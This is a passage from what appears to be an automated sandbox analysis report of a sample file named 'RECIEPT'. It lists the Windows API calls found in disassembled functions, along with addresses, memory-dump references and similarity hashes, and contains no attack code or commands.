                                        • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                        • String ID:
                                        • API String ID: 3257027151-0
                                        • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                        • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                        • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                        • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                        APIs
                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ErrorLastselect
                                        • String ID:
                                        • API String ID: 215497628-0
                                        • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                        • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                        • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                        • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                        APIs
                                        • GetParent.USER32(?), ref: 0044443B
                                        • GetKeyboardState.USER32(?), ref: 00444450
                                        • SetKeyboardState.USER32(?), ref: 004444A4
                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                        • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                        • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                        • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                        APIs
                                        • GetParent.USER32(?), ref: 00444633
                                        • GetKeyboardState.USER32(?), ref: 00444648
                                        • SetKeyboardState.USER32(?), ref: 0044469C
                                        • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                        • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                        • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                        • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                        • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                        • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                        • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                        APIs
                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                        • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                        • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                        • DeleteObject.GDI32(?), ref: 00455736
                                        • DeleteObject.GDI32(?), ref: 00455744
                                        • DestroyIcon.USER32(?), ref: 00455752
                                        • DestroyWindow.USER32(?), ref: 00455760
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                        • String ID:
                                        • API String ID: 2354583917-0
                                        • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                        • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                        • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                        • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                        APIs
                                        • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                        • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                        • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: AddressProc$Library$FreeLoad
                                        • String ID: v
                                        • API String ID: 2449869053-2904040280
                                        • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                        • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                        • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                        • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                        • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                        • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                        • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                        APIs
                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Window$Enable$Show$MessageMoveSend
                                        • String ID:
                                        • API String ID: 896007046-0
                                        • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                        • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                        • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                        • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                        APIs
                                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                        • GetFocus.USER32 ref: 00448ACF
                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Window$Enable$Show$FocusMessageSend
                                        • String ID:
                                        • API String ID: 3429747543-0
                                        • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                        • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                        • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                        • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                        • __swprintf.LIBCMT ref: 0045D4E9
                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ErrorMode$InformationVolume__swprintf
                                        • String ID: %lu$\VH
                                        • API String ID: 3164766367-2432546070
                                        • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                        • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                        • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                        • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                        APIs
                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                        • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                        • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: Msctls_Progress32
                                        • API String ID: 3850602802-3636473452
                                        • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                        • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                        • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                        • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                        • String ID:
                                        • API String ID: 3985565216-0
                                        • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                        • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                        • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                        • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                        APIs
                                        • _malloc.LIBCMT ref: 0041F707
                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                        • _free.LIBCMT ref: 0041F71A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: AllocateHeap_free_malloc
                                        • String ID: [B
                                        • API String ID: 1020059152-632041663
                                        • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                        • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                        • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                        • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                        APIs
                                        • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                        • __calloc_crt.LIBCMT ref: 00413DB0
                                        • __getptd.LIBCMT ref: 00413DBD
                                        • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                        • _free.LIBCMT ref: 00413E07
                                        • __dosmaperr.LIBCMT ref: 00413E12
                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                        • String ID:
                                        • API String ID: 155776804-0
                                        • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                        • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                        • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                        • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                        APIs
                                          • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                          • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                        • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                        • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                        • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                        • String ID:
                                        • API String ID: 1957940570-0
                                        • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                        • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                        • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                        • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 004302E6
                                        • GetWindowRect.USER32(00000000,?), ref: 00430316
                                        • GetClientRect.USER32(?,?), ref: 00430364
                                        • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                        • GetWindowRect.USER32(?,?), ref: 004303C3
                                        • ScreenToClient.USER32(?,?), ref: 004303EC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
